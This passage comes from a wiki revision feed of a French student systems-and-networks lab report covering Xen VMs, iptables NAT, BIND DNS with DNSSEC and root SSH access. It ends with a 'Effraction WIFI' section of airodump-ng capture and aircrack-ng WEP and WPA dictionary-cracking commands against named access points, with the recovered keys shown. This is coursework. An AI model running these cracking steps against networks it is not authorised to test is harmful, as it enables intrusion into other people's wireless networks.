iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir sauvegarder avec iptables-save, on décommente dans  &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin pour permettre de se ssh en root sur toutes les VM, on ajoute dans  &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant, il n'est plus obligatoire de passer par capbreton pour se connecter aux VM, nous utiliserons les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@193.48.57.166 #pour la machine mandataire&lt;br /&gt;
ssh root@193.48.57.166 -p 2202 # pour la machine de service&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== DNS ====&lt;br /&gt;
&lt;br /&gt;
===== Machine de service =====&lt;br /&gt;
On débute par modifier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; , on y ajoute notre zone principale et celle de notre camarade :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                           &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis on crée notre zone db.archlinux.lol :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
$TTL 400                                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN SOA ns.archlinux.lol. admin.archlinux.lol. (                                   &lt;br /&gt;
           3611     ; Numéro de version                                             &lt;br /&gt;
          21600     ; Rafraîchissement (6h)                                         &lt;br /&gt;
           3600     ; Re-tentative (1h)                                             &lt;br /&gt;
        2592000     ; Expiration (30j)                                              &lt;br /&gt;
          86400     ; Cache négatif (24h)                                           &lt;br /&gt;
);                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN NS ns.archlinux.lol.                                                           &lt;br /&gt;
@ IN NS ns.archlinuxbtw.lol.                                                        &lt;br /&gt;
                                                                                    &lt;br /&gt;
ns IN A 193.48.57.166                                                               &lt;br /&gt;
@ IN A 193.48.57.166                                                                &lt;br /&gt;
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                    &lt;br /&gt;
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                     &lt;br /&gt;
                                                                                    &lt;br /&gt;
www IN CNAME archlinux.lol.                                                         &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Machine mandataire =====&lt;br /&gt;
Dans la machine mandataire, on doit passer les zones de nos machine de service en zone secondaire, ainsi, on aura un fichier tel que celui-ci :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinux.lol&amp;quot;;                                   &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe36:79d9;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, il faut rajouter nos zones au Glue records de Gandi pour que notre DNS soit reconnu partout dans le monde.&lt;br /&gt;
&lt;br /&gt;
On peut d'ailleurs le vérifier sur le site https://dnschecker.org/&lt;br /&gt;
&lt;br /&gt;
==== DNSSEC ====&lt;br /&gt;
Afin de sécuriser notre DNS, on modifie notre &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
        key-directory &amp;quot;/etc/bind/keys&amp;quot;;                                             &lt;br /&gt;
        dnssec-policy &amp;quot;dnspol&amp;quot;;                                                     &lt;br /&gt;
        inline-signing yes;&lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {                                                            &lt;br /&gt;
   keys {                                                                           &lt;br /&gt;
       ksk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
       zsk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
   };                                                                               &lt;br /&gt;
   nsec3param;                                                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et on ajoute un répertoire pour les clés (auquel on donnera les permissions d'écriture) :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys &lt;br /&gt;
chown bind:bind /etc/bind/keys &lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir redémaré bind9 et named, on peut voir que les clés sont effectivement bien généré. Pour vérifier si notre DNS est sécurisé, il faudra passer par https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
==== serveur Apache ====&lt;br /&gt;
En premier lieu, on va générer notre clé avec :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinux.lol.key -out archlinux.csr&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Effraction WIFI ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On trouve cracotte06 avec son adresse et son chanel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier dump étant crée, on récupère la clé avec la commande suivante :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                               Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 13 minutes, 48 seconds                         66.97%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66684666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD &lt;br /&gt;
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12485</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12485"/>
		<updated>2026-02-27T12:35:10Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Compte rendu : ===&lt;br /&gt;
&lt;br /&gt;
==== Création du bridge dans capbreton ====&lt;br /&gt;
Avant de créer nos VM, on ajoute notre bridge à capbreton  dans SE42026_cpayet_tdelobel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto pont_pacman&lt;br /&gt;
iface pont_pacman inet manual&lt;br /&gt;
    bridge_ports none&lt;br /&gt;
    up ip link set $IFACE up&lt;br /&gt;
    down ip link set $IFACE down&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On utilise ifup pour le démarrer.&lt;br /&gt;
&lt;br /&gt;
==== Création des VMs ====&lt;br /&gt;
Pour créer la VM de service et mandataire, on utilise les commandes suivantes&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4.Manjaro         --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
xen-create-image --hostname=SE4.LinusTorvalds   --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Manjaro sera la machine de service et LinusTorvalds la mandataire&lt;br /&gt;
&lt;br /&gt;
Puis &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4.Manjaro.cfg&lt;br /&gt;
xen create /etc/xen/SE4.LinusTorvalds.cfg&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nos machines sont maintenant listées.&lt;br /&gt;
&lt;br /&gt;
==== Partitionnement ====&lt;br /&gt;
&lt;br /&gt;
===== Sur capbreton =====&lt;br /&gt;
Tout d'abord on se donne 10g d'espace pour notre machine virtuelle :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
lvcreate -n SE4.Manjaro.var -L 10G virtual&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute dans /etc/xen/SE4.Manjaro.cfg : &amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
disk = [&lt;br /&gt;
            [...],&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.home,xvda3,w',&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.var,xvdb1,w'&lt;br /&gt;
        ]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Sur la VM =====&lt;br /&gt;
Afin que la configuration soit enregistré, on modifie le /etc/fstab en ajoutant les lignes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis dans le terminal, on utilise les commandes suivantes (à ne surtout pas utiliser sur capbreton !!)&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvda3 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On peut maintenant relancer la machine pour verifier si la config reste.&lt;br /&gt;
&lt;br /&gt;
Enfin on répète le même schéma pour la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
==== Adresses ipv4 et ipv6 ====&lt;br /&gt;
Tout d'abord dans notre machine des service, on donne une adresse ipv4 local et ipv6, on modifie donc le fichier /etc/network/interfaces :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.10.2/24&lt;br /&gt;
    gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On va aussi ajouter le bridge depuis capbreton dans /etc/xen/SE4.Manjaro.cfg:&amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Et dans la machine mandataire on va donner une adresse ipv4 du reseau publique et privé:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo                                                                             &lt;br /&gt;
iface lo inet loopback                                                              &lt;br /&gt;
&lt;br /&gt;
auto eth0                                                                           &lt;br /&gt;
iface eth0 inet static                                                              &lt;br /&gt;
        address 192.168.10.1/24                                                     &lt;br /&gt;
&lt;br /&gt;
auto eth1                                                                           &lt;br /&gt;
iface eth1 inet static                                                              &lt;br /&gt;
        address 193.48.57.166/24                                                    &lt;br /&gt;
        gateway 193.48.57.162                                                       &lt;br /&gt;
iface eth1 inet6 auto                                                               &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute au fichier resolv.conf le dns de google et on install les outils qui nous servirons pour la suite (iptables-persistant, ssh, bind9, apache 2...)&lt;br /&gt;
&lt;br /&gt;
==== Masquerade et ssh ====&lt;br /&gt;
Nous pouvons maintenant mettre en places les iptables pour s'occuper à la fois du ssh (redirection de port) et de la Masquerade avec les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir sauvegarder avec iptables-save, on décommente dans  &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin pour permettre de se ssh en root sur toutes les VM, on ajoute dans  &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant, il n'est plus obligatoire de passer par capbreton pour se connecter aux VM, nous utiliserons les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@193.48.57.166 #pour la machine mandataire&lt;br /&gt;
ssh root@193.48.57.166 -p 2202 # pour la machine de service&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Effraction WIFI ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On trouve cracotte06 avec son adresse et son chanel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier dump étant crée, on récupère la clé avec la commande suivante :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                               Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 13 minutes, 48 seconds                         66.97%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66684666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD &lt;br /&gt;
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12473</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12473"/>
		<updated>2026-02-27T11:55:29Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Compte rendu : ===&lt;br /&gt;
&lt;br /&gt;
==== Création du bridge dans capbreton ====&lt;br /&gt;
Avant de créer nos VM, on ajoute notre bridge à capbreton  dans SE42026_cpayet_tdelobel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto pont_pacman&lt;br /&gt;
iface pont_pacman inet manual&lt;br /&gt;
    bridge_ports none&lt;br /&gt;
    up ip link set $IFACE up&lt;br /&gt;
    down ip link set $IFACE down&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On utilise ifup pour le démarrer.&lt;br /&gt;
&lt;br /&gt;
==== Création des VMs ====&lt;br /&gt;
Pour créer la VM de service et mandataire, on utilise les commandes suivantes&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4.Manjaro         --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
xen-create-image --hostname=SE4.LinusTorvalds   --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Manjaro sera la machine de service et LinusTorvalds la mandataire&lt;br /&gt;
&lt;br /&gt;
Puis &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4.Manjaro.cfg&lt;br /&gt;
xen create /etc/xen/SE4.LinusTorvalds.cfg&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nos machines sont maintenant listées.&lt;br /&gt;
&lt;br /&gt;
==== Partitionnement ====&lt;br /&gt;
&lt;br /&gt;
===== Sur capbreton =====&lt;br /&gt;
Tout d'abord on se donne 10g d'espace pour notre machine virtuelle :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
lvcreate -n SE4.Manjaro.var -L 10G virtual&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute dans /etc/xen/SE4.Manjaro.cfg : &amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
disk = [&lt;br /&gt;
            [...],&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.home,xvda3,w',&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.var,xvdb1,w'&lt;br /&gt;
        ]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Sur la VM =====&lt;br /&gt;
Afin que la configuration soit enregistré, on modifie le /etc/fstab en ajoutant les lignes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
